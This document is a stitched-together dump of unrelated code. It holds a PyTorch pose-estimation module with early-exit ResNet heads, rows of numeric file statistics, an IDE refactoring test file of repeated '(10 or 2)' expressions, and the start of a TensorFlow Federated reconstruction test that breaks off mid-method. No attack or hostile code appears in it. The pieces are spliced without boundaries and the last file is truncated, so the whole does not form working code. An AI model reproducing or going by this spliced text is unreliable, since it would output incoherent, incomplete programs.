        assert num_layers == len(num_filters), \
            'ERROR: num_deconv_layers is different len(num_deconv_filters)'
        assert num_layers == len(num_kernels), \
            'ERROR: num_deconv_layers is different len(num_deconv_filters)'

        layers = []
        for i in range(num_layers):
            kernel, padding, output_padding = \
                self._get_deconv_cfg(num_kernels[i], i)

            planes = num_filters[i]
            layers.append(
                nn.ConvTranspose2d(
                    in_channels=self.inplanes,
                    out_channels=planes,
                    kernel_size=kernel,
                    stride=2,
                    padding=padding,
                    output_padding=output_padding,
                    bias=self.deconv_with_bias))
            layers.append(nn.BatchNorm2d(planes, momentum=BN_MOMENTUM))
            layers.append(nn.ReLU(inplace=True))
            self.inplanes = planes

        return nn.Sequential(*layers)

    def forward(self, input):
        # Backbone produces the final features and the early-exit features.
        x, x_exit = self.backbone_s1(input)
        # Early-exit head.
        x_exit = self.head_deconv_layers(x_exit)
        x_exit = self.head_final_layer(x_exit)
        # x = self.backbone_s2(x)
        # Main head.
        x = self.deconv_layers(x)
        x = self.final_layer(x)
        return x, x_exit

    def init_weights(self, pretrained=''):
        """Initialize the early-exit head and load the remaining weights from
        the checkpoint file ``pretrained`` (non-strict, DataParallel-aware).

        Raises:
            ValueError: if ``pretrained`` is not an existing file.
            RuntimeError: if the checkpoint contains no state dict.
        """
        if os.path.isfile(pretrained):
            logger.info('=> init head deconv weights from normal distribution')
            # for name, m in self.named_parameters():
            #     m.requires_grad = False
            for name, m in self.head_deconv_layers.named_modules():
                if isinstance(m, nn.ConvTranspose2d):
                    logger.info('=> init {}.weight as normal(0, 0.001)'.format(name))
                    logger.info('=> init {}.bias as 0'.format(name))
                    nn.init.normal_(m.weight, std=0.001)
                    if self.deconv_with_bias:
                        nn.init.constant_(m.bias, 0)
                elif isinstance(m, nn.BatchNorm2d):
                    logger.info('=> init {}.weight as 1'.format(name))
                    logger.info('=> init {}.bias as 0'.format(name))
                    nn.init.constant_(m.weight, 1)
                    nn.init.constant_(m.bias, 0)
            logger.info('=> init head final conv weights from normal distribution')
            # BUGFIX: the original iterated ``modules()`` and logged the stale
            # ``name`` left over from the loop above; use named_modules() so
            # the logged name matches the module.
            for name, m in self.head_final_layer.named_modules():
                if isinstance(m, nn.Conv2d):
                    # nn.init.kaiming_normal_(m.weight, mode='fan_out', nonlinearity='relu')
                    logger.info('=> init {}.weight as normal(0, 0.001)'.format(name))
                    logger.info('=> init {}.bias as 0'.format(name))
                    nn.init.normal_(m.weight, std=0.001)
                    nn.init.constant_(m.bias, 0)

            # for name, m in self.head_deconv_layers.named_parameters():
            #     m.requires_grad = True
            # for name, m in self.head_final_layer.named_parameters():
            #     m.requires_grad = True
            # pretrained_state_dict = torch.load(pretrained)
            logger.info('=> loading pretrained model {}'.format(pretrained))
            # self.load_state_dict(pretrained_state_dict, strict=False)
            checkpoint = torch.load(pretrained)
            if isinstance(checkpoint, OrderedDict):
                state_dict = checkpoint
            elif isinstance(checkpoint, dict) and 'state_dict' in checkpoint:
                state_dict_old = checkpoint['state_dict']
                state_dict = OrderedDict()
                # delete 'module.' because it is saved from DataParallel module
                for key in state_dict_old.keys():
                    if key.startswith('module.'):
                        state_dict[key[7:]] = state_dict_old[key]
                    else:
                        state_dict[key] = state_dict_old[key]
            else:
                raise RuntimeError(
                    'No state_dict found in checkpoint file {}'.format(pretrained))
            self.load_state_dict(state_dict, strict=False)
        else:
            # Typo fixed ('dose' -> 'does') to match the ValueError below.
            logger.error('=> imagenet pretrained model does not exist')
            logger.error('=> please download it first')
            raise ValueError('imagenet pretrained model does not exist')
class PoseResNetwthOnlyExit(nn.Module):
    """Pose-estimation network that runs only the early-exit branch.

    Wraps ``backbone_s1`` built with ``start_point == end_point`` (shared stem
    plus the exit branch only), followed by a stack of deconvolution layers and
    a final conv producing per-joint heatmaps.  The full-depth feature map the
    backbone also returns is discarded in ``forward``.
    """

    def __init__(self, block, layers, cfg, start_point, **kwargs):
        # `block`/`layers` are accepted for signature parity with the other
        # PoseResNet variants; the actual trunk is built by backbone_s1.
        super(PoseResNetwthOnlyExit, self).__init__()
        extra = cfg.MODEL.EXTRA
        self.deconv_with_bias = extra.DECONV_WITH_BIAS
        self.backbone_s1 = backbone_s1(start_point=start_point, end_point=start_point)
        # Exit branch output width (ResNet Bottleneck stage-4 channel count).
        self.inplanes = 2048
        self.deconv_layers = self._make_deconv_layer(
            extra.NUM_DECONV_LAYERS,
            extra.NUM_DECONV_FILTERS,
            extra.NUM_DECONV_KERNELS,
        )
        self.final_layer = nn.Conv2d(
            in_channels=extra.NUM_DECONV_FILTERS[-1],
            out_channels=cfg.MODEL.NUM_JOINTS,
            kernel_size=extra.FINAL_CONV_KERNEL,
            stride=1,
            # 'same' padding for a 3x3 kernel, none for 1x1.
            padding=1 if extra.FINAL_CONV_KERNEL == 3 else 0
        )

    def _get_deconv_cfg(self, deconv_kernel, index):
        """Return (kernel, padding, output_padding) for a deconv kernel size."""
        if deconv_kernel == 4:
            padding = 1
            output_padding = 0
        elif deconv_kernel == 3:
            padding = 1
            output_padding = 1
        elif deconv_kernel == 2:
            padding = 0
            output_padding = 0
        else:
            # BUG FIX: previously fell through and raised UnboundLocalError;
            # fail with an explicit message instead.
            raise ValueError('unsupported deconv kernel size: {}'.format(deconv_kernel))
        return deconv_kernel, padding, output_padding

    def _make_deconv_layer(self, num_layers, num_filters, num_kernels):
        """Build `num_layers` upsampling stages (ConvTranspose2d -> BN -> ReLU)."""
        assert num_layers == len(num_filters), \
            'ERROR: num_deconv_layers is different len(num_deconv_filters)'
        assert num_layers == len(num_kernels), \
            'ERROR: num_deconv_layers is different len(num_deconv_filters)'
        layers = []
        for i in range(num_layers):
            kernel, padding, output_padding = \
                self._get_deconv_cfg(num_kernels[i], i)
            planes = num_filters[i]
            layers.append(
                nn.ConvTranspose2d(
                    in_channels=self.inplanes,
                    out_channels=planes,
                    kernel_size=kernel,
                    stride=2,
                    padding=padding,
                    output_padding=output_padding,
                    bias=self.deconv_with_bias))
            layers.append(nn.BatchNorm2d(planes, momentum=BN_MOMENTUM))
            layers.append(nn.ReLU(inplace=True))
            # Next stage consumes this stage's output channels.
            self.inplanes = planes
        return nn.Sequential(*layers)

    def forward(self, input):
        """Return exit-branch heatmaps; the full-depth path `x` is discarded."""
        x, x_exit = self.backbone_s1(input)
        x_exit = self.deconv_layers(x_exit)
        x_exit = self.final_layer(x_exit)
        return x_exit

    def init_weights(self, pretrained=''):
        """Initialize the head layers, load `pretrained` weights, freeze trunk.

        Deconv/final layers are re-initialized from a normal distribution,
        checkpoint keys are remapped onto this module's names, and every
        backbone parameter outside the exit branch is frozen.

        Raises:
            ValueError: if `pretrained` is not an existing file.
        """
        if os.path.isfile(pretrained):
            logger.info('=> init head deconv weights from normal distribution')
            for name, m in self.deconv_layers.named_modules():
                if isinstance(m, nn.ConvTranspose2d):
                    logger.info('=> init {}.weight as normal(0, 0.001)'.format(name))
                    logger.info('=> init {}.bias as 0'.format(name))
                    nn.init.normal_(m.weight, std=0.001)
                    if self.deconv_with_bias:
                        nn.init.constant_(m.bias, 0)
                elif isinstance(m, nn.BatchNorm2d):
                    logger.info('=> init {}.weight as 1'.format(name))
                    logger.info('=> init {}.bias as 0'.format(name))
                    nn.init.constant_(m.weight, 1)
                    nn.init.constant_(m.bias, 0)
            logger.info('=> init head final conv weights from normal distribution')
            # BUG FIX: the original iterated `self.final_layer.modules()` and
            # logged the stale `name` left over from the deconv loop above;
            # iterate named_modules so the log reports the right module.
            for name, m in self.final_layer.named_modules():
                if isinstance(m, nn.Conv2d):
                    logger.info('=> init {}.weight as normal(0, 0.001)'.format(name))
                    logger.info('=> init {}.bias as 0'.format(name))
                    nn.init.normal_(m.weight, std=0.001)
                    nn.init.constant_(m.bias, 0)
            logger.info('=> loading pretrained model {}'.format(pretrained))
            checkpoint = torch.load(pretrained)
            dict_trained = checkpoint.copy()
            dict_new = OrderedDict()
            # Remap checkpoint keys onto this module's names.  The slice
            # offsets strip module-path prefixes: k[16:] drops
            # 'backbone_s1.pre.', k[19:] drops 'backbone_s1.exit.N.',
            # k[12:] drops 'backbone_s1.'.  (Offsets assume exactly those
            # prefixes -- verify if the backbone's attribute names change.)
            for k, v in self.state_dict().items():
                if 'num_batches_tracked' not in k:
                    if 'backbone_s1.pre' in k:
                        dict_new[k] = dict_trained[k[16:]]
                    elif 'backbone_s1.exit' in k:
                        # Exit blocks reuse the first block of the matching
                        # ResNet stage, counted back from layer4.
                        if len(self.backbone_s1.exit) == 1:
                            dict_new[k] = dict_trained['layer4.0.' + k[19:]]
                        elif len(self.backbone_s1.exit) == 2:
                            if 'exit.0' in k:
                                dict_new[k] = dict_trained['layer3.0.' + k[19:]]
                            elif 'exit.1' in k:
                                dict_new[k] = dict_trained['layer4.0.' + k[19:]]
                        elif len(self.backbone_s1.exit) == 3:
                            if 'exit.0' in k:
                                dict_new[k] = dict_trained['layer2.0.' + k[19:]]
                            elif 'exit.1' in k:
                                dict_new[k] = dict_trained['layer3.0.' + k[19:]]
                            elif 'exit.2' in k:
                                dict_new[k] = dict_trained['layer4.0.' + k[19:]]
                    elif 'deconv' in k or 'final' in k:
                        dict_new[k] = dict_trained[k]
                    else:
                        dict_new[k] = dict_trained[k[12:]]
            # Freeze the shared trunk; keep exit branch and heads trainable.
            for k, v in self.named_parameters():
                if 'backbone' in k and 'exit' not in k:
                    v.requires_grad = False
                else:
                    v.requires_grad = True
            self.load_state_dict(dict_new, strict=False)
        else:
            # BUG FIX: corrected 'dose' -> 'does' in the error log message.
            logger.error('=> imagenet pretrained model does not exist')
            logger.error('=> please download it first')
            raise ValueError('imagenet pretrained model does not exist')
class PoseResNetwthMultiExit(nn.Module):
    """Pose network with multiple early exits sharing one forward trunk.

    Builds one single-exit network per entry in `exit_list` (the last one,
    start_point=33, covers the full depth and is loaded from a final-head
    checkpoint), then slices their backbones into consecutive segments so a
    single forward pass feeds every exit head in turn.
    """

    def __init__(self, block, layers, cfg, exit_list, **kwargs):
        super(PoseResNetwthMultiExit, self).__init__()
        extra = cfg.MODEL.EXTRA
        self.deconv_with_bias = extra.DECONV_WITH_BIAS
        self.ori_backbone = nn.ModuleList()
        self.backbone = nn.ModuleList()
        self.exit_list = exit_list
        # One single-exit network per split point except the final one.
        for i in range(len(exit_list) - 1):
            self.ori_backbone.append(
                get_pose_net_with_only_exit(cfg, is_train=True, start_point=self.exit_list[i]))
        # Final network gets the pretrained final-head weights.
        self.ori_backbone.append(get_pose_net_with_only_exit(cfg, is_train=True, start_point=33))
        net_wth_finalhead = torch.load('/home/slzhang/projects/ETBA/Train/pose_estimation/checkpoints/pose_resnet_101_384x384.pth.tar')
        new_dict = OrderedDict()
        dict_finalhead = net_wth_finalhead.copy()
        dict_finalhead_keys = list(net_wth_finalhead.keys())
        # NOTE(review): tensors are copied positionally (by key order) while
        # skipping num_batches_tracked entries -- this assumes both state
        # dicts enumerate parameters in the same order; verify on upgrade.
        i = 0
        for k, v in self.ori_backbone[len(exit_list) - 1].state_dict().items():
            if 'num_batches_tracked' not in k:
                new_dict[k] = dict_finalhead[dict_finalhead_keys[i]]
                i = i + 1
        self.ori_backbone[len(exit_list) - 1].load_state_dict(new_dict, strict=True)
        ori_backbone_copy = copy.deepcopy(self.ori_backbone)
        for i in range(len(exit_list)):
            if i == 0:
                # First segment: everything in the first backbone except its
                # exit branch (the last child).
                flatt_model = nn.Sequential(*list(ori_backbone_copy[i].backbone_s1.children())[:-1])
                self.backbone.append(flatt_model)
            else:
                print('-------------------')
                backbone = nn.Sequential()
                # Count Bottlenecks already covered by the previous segment...
                last_bottleneck_num = 0
                for layer in ori_backbone_copy[i - 1].backbone_s1.named_modules():
                    if isinstance(layer[1], Bottleneck) and 'exit' not in layer[0]:
                        last_bottleneck_num = last_bottleneck_num + 1
                # ...then keep only the Bottlenecks beyond that point.
                cnt = 0
                for layer in ori_backbone_copy[i].backbone_s1.named_modules():
                    if isinstance(layer[1], Bottleneck) and 'exit' not in layer[0]:
                        cnt = cnt + 1
                        if cnt > last_bottleneck_num:
                            # Module names may not contain '.' in add_module.
                            backbone.add_module(layer[0].replace('.', ' '), layer[1])
                self.backbone.append(backbone)
            for k, v in self.backbone[i].named_parameters():
                v.requires_grad = True
            for k, v in self.ori_backbone[i].named_parameters():
                v.requires_grad = True
        # Collect per-exit heads; the assembled `self.backbone` segments own
        # the trunk, so the original networks can be dropped afterwards.
        self.exit = nn.ModuleList()
        self.deconv_layers = nn.ModuleList()
        self.final_layer = nn.ModuleList()
        for i in range(len(exit_list)):
            self.exit.append(self.ori_backbone[i].backbone_s1.exit)
            self.deconv_layers.append(self.ori_backbone[i].deconv_layers)
            self.final_layer.append(self.ori_backbone[i].final_layer)
        print(self.exit_list)
        del self.ori_backbone

    def _get_deconv_cfg(self, deconv_kernel, index):
        """Return (kernel, padding, output_padding) for a deconv kernel size."""
        if deconv_kernel == 4:
            padding = 1
            output_padding = 0
        elif deconv_kernel == 3:
            padding = 1
            output_padding = 1
        elif deconv_kernel == 2:
            padding = 0
            output_padding = 0
        else:
            # BUG FIX: previously fell through and raised UnboundLocalError.
            raise ValueError('unsupported deconv kernel size: {}'.format(deconv_kernel))
        return deconv_kernel, padding, output_padding

    def _make_deconv_layer(self, num_layers, num_filters, num_kernels):
        """Build upsampling stages (ConvTranspose2d -> BN -> ReLU).

        NOTE(review): unused in this class -- `self.inplanes` is never set in
        __init__, so calling this would raise AttributeError.  Kept for
        interface parity with the single-exit variants.
        """
        assert num_layers == len(num_filters), \
            'ERROR: num_deconv_layers is different len(num_deconv_filters)'
        assert num_layers == len(num_kernels), \
            'ERROR: num_deconv_layers is different len(num_deconv_filters)'
        layers = []
        for i in range(num_layers):
            kernel, padding, output_padding = \
                self._get_deconv_cfg(num_kernels[i], i)
            planes = num_filters[i]
            layers.append(
                nn.ConvTranspose2d(
                    in_channels=self.inplanes,
                    out_channels=planes,
                    kernel_size=kernel,
                    stride=2,
                    padding=padding,
                    output_padding=output_padding,
                    bias=self.deconv_with_bias))
            layers.append(nn.BatchNorm2d(planes, momentum=BN_MOMENTUM))
            layers.append(nn.ReLU(inplace=True))
            self.inplanes = planes
        return nn.Sequential(*layers)

    def forward(self, x):
        """Feed x through each trunk segment, collecting one heatmap per exit."""
        output = []
        for i in range(len(self.exit_list)):
            x = self.backbone[i](x)
            x_exit = self.exit[i](x)
            x_exit = self.deconv_layers[i](x_exit)
            x_exit = self.final_layer[i](x_exit)
            output.append(x_exit)
        return output

    def init_weights(self, pretrained=''):
        """Initialize heads and load `pretrained` weights.

        NOTE(review): copied from PoseResNetwthOnlyExit -- the key-remapping
        below references `self.backbone_s1`, which this class does not define,
        so executing that path raises AttributeError.  The factory
        (get_pose_net_with_multi_exit) does not call this method; fix the
        remapping before enabling it.

        Raises:
            ValueError: if `pretrained` is not an existing file.
        """
        if os.path.isfile(pretrained):
            logger.info('=> init head deconv weights from normal distribution')
            for name, m in self.deconv_layers.named_modules():
                if isinstance(m, nn.ConvTranspose2d):
                    logger.info('=> init {}.weight as normal(0, 0.001)'.format(name))
                    logger.info('=> init {}.bias as 0'.format(name))
                    nn.init.normal_(m.weight, std=0.001)
                    if self.deconv_with_bias:
                        nn.init.constant_(m.bias, 0)
                elif isinstance(m, nn.BatchNorm2d):
                    logger.info('=> init {}.weight as 1'.format(name))
                    logger.info('=> init {}.bias as 0'.format(name))
                    nn.init.constant_(m.weight, 1)
                    nn.init.constant_(m.bias, 0)
            logger.info('=> init head final conv weights from normal distribution')
            # BUG FIX: iterate named_modules so the log lines report the
            # correct name instead of the stale one from the loop above.
            for name, m in self.final_layer.named_modules():
                if isinstance(m, nn.Conv2d):
                    logger.info('=> init {}.weight as normal(0, 0.001)'.format(name))
                    logger.info('=> init {}.bias as 0'.format(name))
                    nn.init.normal_(m.weight, std=0.001)
                    nn.init.constant_(m.bias, 0)
            logger.info('=> loading pretrained model {}'.format(pretrained))
            checkpoint = torch.load(pretrained)
            dict_trained = checkpoint.copy()
            dict_new = OrderedDict()
            for k, v in self.state_dict().items():
                if 'num_batches_tracked' not in k:
                    if 'backbone_s1.pre' in k:
                        dict_new[k] = dict_trained[k[16:]]
                    elif 'backbone_s1.exit' in k:
                        if len(self.backbone_s1.exit) == 1:
                            dict_new[k] = dict_trained['layer4.0.' + k[19:]]
                        elif len(self.backbone_s1.exit) == 2:
                            if 'exit.0' in k:
                                dict_new[k] = dict_trained['layer3.0.' + k[19:]]
                            elif 'exit.1' in k:
                                dict_new[k] = dict_trained['layer4.0.' + k[19:]]
                        elif len(self.backbone_s1.exit) == 3:
                            if 'exit.0' in k:
                                dict_new[k] = dict_trained['layer2.0.' + k[19:]]
                            elif 'exit.1' in k:
                                dict_new[k] = dict_trained['layer3.0.' + k[19:]]
                            elif 'exit.2' in k:
                                dict_new[k] = dict_trained['layer4.0.' + k[19:]]
                    elif 'deconv' in k or 'final' in k:
                        dict_new[k] = dict_trained[k]
                    else:
                        dict_new[k] = dict_trained[k[12:]]
            # Freeze the shared trunk; keep exit branches and heads trainable.
            for k, v in self.named_parameters():
                if 'backbone' in k and 'exit' not in k:
                    v.requires_grad = False
                else:
                    v.requires_grad = True
            self.load_state_dict(dict_new, strict=False)
        else:
            # BUG FIX: corrected 'dose' -> 'does' in the error log message.
            logger.error('=> imagenet pretrained model does not exist')
            logger.error('=> please download it first')
            raise ValueError('imagenet pretrained model does not exist')
# Mapping: ResNet depth -> (residual block class, per-stage block counts).
resnet_spec = {18: (BasicBlock, [2, 2, 2, 2]),
               34: (BasicBlock, [3, 4, 6, 3]),
               50: (Bottleneck, [3, 4, 6, 3]),
               101: (Bottleneck, [3, 4, 23, 3]),
               152: (Bottleneck, [3, 8, 36, 3])}
def get_pose_net(cfg, is_train, **kwargs):
    """Build a plain PoseResNet from `cfg`; optionally load pretrained weights."""
    block_class, layers = resnet_spec[cfg.MODEL.EXTRA.NUM_LAYERS]
    # Caffe-style networks swap in a Bottleneck variant with a different
    # stride placement.
    if cfg.MODEL.STYLE == 'caffe':
        block_class = Bottleneck_CAFFE
    model = PoseResNet(block_class, layers, cfg, **kwargs)
    if is_train and cfg.MODEL.INIT_WEIGHTS:
        model.init_weights(cfg.MODEL.PRETRAINED)
    return model
def get_pose_net_with_exit(cfg, is_train, start_point, **kwargs):
    """Build a PoseResNetwthExit split at `start_point`.

    Weight initialization is intentionally a no-op here; loading is handled
    elsewhere for this variant.
    """
    block_class, layers = resnet_spec[cfg.MODEL.EXTRA.NUM_LAYERS]
    if cfg.MODEL.STYLE == 'caffe':
        block_class = Bottleneck_CAFFE
    model = PoseResNetwthExit(block_class, layers, cfg, start_point, **kwargs)
    if is_train and cfg.MODEL.INIT_WEIGHTS:
        pass
    print("Model obtained!")
    return model
def get_pose_net_with_only_exit(cfg, is_train, start_point, **kwargs):
    """Build a PoseResNetwthOnlyExit split at `start_point`.

    When training with INIT_WEIGHTS set, the network is initialized from the
    checkpoint that includes the final head (PRETRAINED_WITH_HEAD).
    """
    block_class, layers = resnet_spec[cfg.MODEL.EXTRA.NUM_LAYERS]
    if cfg.MODEL.STYLE == 'caffe':
        block_class = Bottleneck_CAFFE
    model = PoseResNetwthOnlyExit(block_class, layers, cfg, start_point, **kwargs)
    if is_train and cfg.MODEL.INIT_WEIGHTS:
        model.init_weights(cfg.MODEL.PRETRAINED_WITH_HEAD)
    print("Model obtained!")
    return model
def get_pose_net_with_multi_exit(cfg, is_train, exit_list, **kwargs):
    """Build a PoseResNetwthMultiExit with heads at each point in `exit_list`.

    No explicit weight initialization here: the multi-exit constructor loads
    its own sub-network weights internally.
    """
    block_class, layers = resnet_spec[cfg.MODEL.EXTRA.NUM_LAYERS]
    if cfg.MODEL.STYLE == 'caffe':
        block_class = Bottleneck_CAFFE
    model = PoseResNetwthMultiExit(block_class, layers, cfg, exit_list, **kwargs)
    print("Model obtained!")
    return model
def get_children(model: torch.nn.Module):
    """Recursively flatten `model` into a list of its leaf modules.

    A module with no children is a leaf and is returned as-is (not wrapped in
    a list); any container module yields a flat list of all its leaves.

    BUG FIX: the original used `extend(...)` and relied on catching TypeError
    to detect leaves.  Container modules such as nn.Sequential/nn.ModuleList
    are themselves iterable, so an *empty* container leaf was silently
    iterated by `extend` and dropped from the result.  Checking the return
    type explicitly handles every case.
    """
    children = list(model.children())
    if not children:
        # Leaf module: return it directly (caller flattens).
        return model
    flatt_children = []
    for child in children:
        result = get_children(child)
        if isinstance(result, list):
            flatt_children.extend(result)
        else:
            flatt_children.append(result)
    return flatt_children
| 40.254359
| 158
| 0.55636
| 4,580
| 39,248
| 4.560917
| 0.062227
| 0.036191
| 0.021447
| 0.01034
| 0.854804
| 0.842022
| 0.834602
| 0.818421
| 0.801474
| 0.79324
| 0
| 0.02027
| 0.3338
| 39,248
| 975
| 159
| 40.254359
| 0.778636
| 0.180646
| 0
| 0.742636
| 0
| 0
| 0.087731
| 0.010411
| 0
| 0
| 0
| 0
| 0.012403
| 1
| 0.048062
| false
| 0.00155
| 0.017054
| 0
| 0.111628
| 0.009302
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
c03469afc2dd59f2e02f81c3a1f5c6b4d48d4490
| 587
|
py
|
Python
|
python/testData/refactoring/inlinelocal/operatorPrecedence/booleanOr.after.py
|
jnthn/intellij-community
|
8fa7c8a3ace62400c838e0d5926a7be106aa8557
|
[
"Apache-2.0"
] | 2
|
2019-04-28T07:48:50.000Z
|
2020-12-11T14:18:08.000Z
|
python/testData/refactoring/inlinelocal/operatorPrecedence/booleanOr.after.py
|
jnthn/intellij-community
|
8fa7c8a3ace62400c838e0d5926a7be106aa8557
|
[
"Apache-2.0"
] | 173
|
2018-07-05T13:59:39.000Z
|
2018-08-09T01:12:03.000Z
|
python/testData/refactoring/inlinelocal/operatorPrecedence/booleanOr.after.py
|
jnthn/intellij-community
|
8fa7c8a3ace62400c838e0d5926a7be106aa8557
|
[
"Apache-2.0"
] | 2
|
2020-03-15T08:57:37.000Z
|
2020-04-07T04:48:14.000Z
|
(10 or 2)[::-5]
(10 or 2)[5]
(10 or 2)(5)
(10 or 2).foo
-(10 or 2)
+(10 or 2)
~(10 or 2)
5 ** (10 or 2)
(10 or 2) ** 5
5 * (10 or 2)
(10 or 2) * 5
5 / (10 or 2)
(10 or 2) / 5
5 // (10 or 2)
(10 or 2) // 5
5 + (10 or 2)
(10 or 2) + 5
(10 or 2) - 5
5 - (10 or 2)
5 >> (10 or 2)
(10 or 2) << 5
5 & (10 or 2)
(10 or 2) & 5
5 ^ (10 or 2)
(10 or 2) ^ 5
5 | (10 or 2)
(10 or 2) | 5
() in (10 or 2)
(10 or 2) in ()
5 is (10 or 2)
(10 or 2) is 5
5 < (10 or 2)
(10 or 2) < 5
not (10 or 2)
5 and (10 or 2)
(10 or 2) and 5
5 or 10 or 2
10 or 2 or 5
10 or 2 if 10 or 2 else 10 or 2
| 10.12069
| 31
| 0.453152
| 166
| 587
| 1.60241
| 0.066265
| 0.616541
| 0.770677
| 0.383459
| 0.793233
| 0.793233
| 0.62406
| 0.62406
| 0.616541
| 0.567669
| 0
| 0.402089
| 0.34753
| 587
| 57
| 32
| 10.298246
| 0.292428
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| null | 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
220cc37c9b12168840dc1016134d5e08c593eac5
| 37,140
|
py
|
Python
|
reconstruction/training_process_test.py
|
Abhin02/federated
|
5fd8f69284c2784b635faadfaf6c66ce843f7701
|
[
"Apache-2.0"
] | 1
|
2022-03-16T02:13:39.000Z
|
2022-03-16T02:13:39.000Z
|
reconstruction/training_process_test.py
|
notminusone/federated
|
6a709f5598450232b918c046cfeba849f479d5cb
|
[
"Apache-2.0"
] | null | null | null |
reconstruction/training_process_test.py
|
notminusone/federated
|
6a709f5598450232b918c046cfeba849f479d5cb
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2020, Google LLC.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for training_process.py."""
import collections
import functools
import attr
import numpy as np
import tensorflow as tf
import tensorflow_federated as tff
import tensorflow_privacy as tfp
from reconstruction import keras_utils
from reconstruction import reconstruction_model
from reconstruction import reconstruction_utils
from reconstruction import training_process
def _create_input_spec():
  """Returns the input spec shared by the MNIST test models."""
  features = tf.TensorSpec(shape=[None, 784], dtype=tf.float32)
  labels = tf.TensorSpec(dtype=tf.int32, shape=[None, 1])
  return collections.OrderedDict(x=features, y=labels)
def global_recon_model_fn():
  """Keras MNIST model where every layer is global (no local variables)."""
  keras_model = tff.simulation.models.mnist.create_keras_model(
      compile_model=False)
  return keras_utils.from_keras_model(
      keras_model=keras_model,
      global_layers=keras_model.layers,
      local_layers=[],
      input_spec=_create_input_spec())
def local_recon_model_fn():
  """Keras MNIST model whose final dense layer is local (reconstructed)."""
  keras_model = tff.simulation.models.mnist.create_keras_model(
      compile_model=False)
  return keras_utils.from_keras_model(
      keras_model=keras_model,
      global_layers=keras_model.layers[:-1],
      local_layers=keras_model.layers[-1:],
      input_spec=_create_input_spec())
@attr.s(eq=False, frozen=True)
class MnistVariables(object):
  """Structure for variables in an MNIST model."""

  # Dense-layer kernel and bias; MnistModel treats `weights` as global
  # (server-aggregated) and `bias` as local (client-reconstructed).
  weights = attr.ib()
  bias = attr.ib()
class MnistModel(reconstruction_model.ReconstructionModel):
  """An implementation of an MNIST `ReconstructionModel` without Keras.

  Applies a single dense layer followed by softmax. The weights of the dense
  layer are global, and the biases are local.
  """

  def __init__(self):
    # Variables are created from initializer callables (lambdas) so they can
    # be built lazily inside a tf.function / TFF context.
    self._variables = MnistVariables(
        weights=tf.Variable(
            lambda: tf.zeros(dtype=tf.float32, shape=(784, 10)),
            name='weights',
            trainable=True),
        bias=tf.Variable(
            lambda: tf.zeros(dtype=tf.float32, shape=(10)),
            name='bias',
            trainable=True))

  @property
  def global_trainable_variables(self):
    # Kernel is shared across clients and aggregated on the server.
    return [self._variables.weights]

  @property
  def global_non_trainable_variables(self):
    return []

  @property
  def local_trainable_variables(self):
    # Bias stays on-device and is reconstructed per client.
    return [self._variables.bias]

  @property
  def local_non_trainable_variables(self):
    return []

  @property
  def input_spec(self):
    # Matches _create_input_spec: flattened 784-dim features, int labels.
    return collections.OrderedDict([('x', tf.TensorSpec([None, 784],
                                                        tf.float32)),
                                    ('y', tf.TensorSpec([None, 1], tf.int32))])

  @tf.function
  def forward_pass(self, batch, training=True):
    # `training` is unused: this model has no train/eval-dependent layers.
    del training
    y = tf.nn.softmax(
        tf.matmul(batch['x'], self._variables.weights) + self._variables.bias)
    return reconstruction_model.BatchOutput(
        predictions=y, labels=batch['y'], num_examples=tf.size(batch['y']))
def create_emnist_client_data():
  """Returns a callable that batches a fixed 3-example synthetic dataset."""
  rng = np.random.default_rng(42)  # fixed seed keeps tests deterministic
  features = [
      rng.standard_normal(784).astype(np.float32) for _ in range(3)
  ]
  emnist_data = collections.OrderedDict([('x', features),
                                         ('y', [[5], [5], [9]])])
  dataset = tf.data.Dataset.from_tensor_slices(emnist_data)

  def client_data(batch_size=2):
    return dataset.batch(batch_size)

  return client_data
class _DPMean(tff.aggregators.UnweightedAggregationFactory):
  """Unweighted mean built from a DP sum: DP-sum result / number of clients."""

  def __init__(self, dp_sum_factory):
    # Factory that creates the differentially-private sum process.
    self._dp_sum = dp_sum_factory
    self._clear_sum = tff.aggregators.SumFactory()

  def create(self, value_type: tff.Type) -> tff.templates.AggregationProcess:
    self._dp_sum_process = self._dp_sum.create(value_type)

    @tff.federated_computation()
    def init():
      # Invoke here to instantiate anything we need
      return self._dp_sum_process.initialize()

    @tff.tf_computation(value_type, tf.int32)
    def div(x, y):
      # Opaque shape manipulations
      return [tf.squeeze(tf.math.divide_no_nan(x, tf.cast(y, tf.float32)), 0)]

    @tff.federated_computation(init.type_signature.result,
                               tff.type_at_clients(value_type))
    def next_fn(state, value):
      # Count participating clients by summing a constant 1 from each.
      one_at_clients = tff.federated_value(1, tff.CLIENTS)
      dp_sum = self._dp_sum_process.next(state, value)
      summed_one = tff.federated_sum(one_at_clients)
      return tff.templates.MeasuredProcessOutput(
          state=dp_sum.state,
          result=tff.federated_map(div, (dp_sum.result, summed_one)),
          measurements=dp_sum.measurements)

    return tff.templates.AggregationProcess(initialize_fn=init, next_fn=next_fn)
class TrainingProcessTest(tf.test.TestCase):
def _run_rounds(self, iterproc, federated_data, num_rounds):
  """Drives `iterproc` for `num_rounds` rounds over `federated_data`.

  Returns a (final_state, per_round_metrics, initial_state) tuple.
  """
  initial_state = iterproc.initialize()
  state = initial_state
  train_outputs = []
  for _ in range(num_rounds):
    state, round_metrics = iterproc.next(state, federated_data)
    train_outputs.append(round_metrics)
  return state, train_outputs, initial_state
def test_build_train_iterative_process(self):
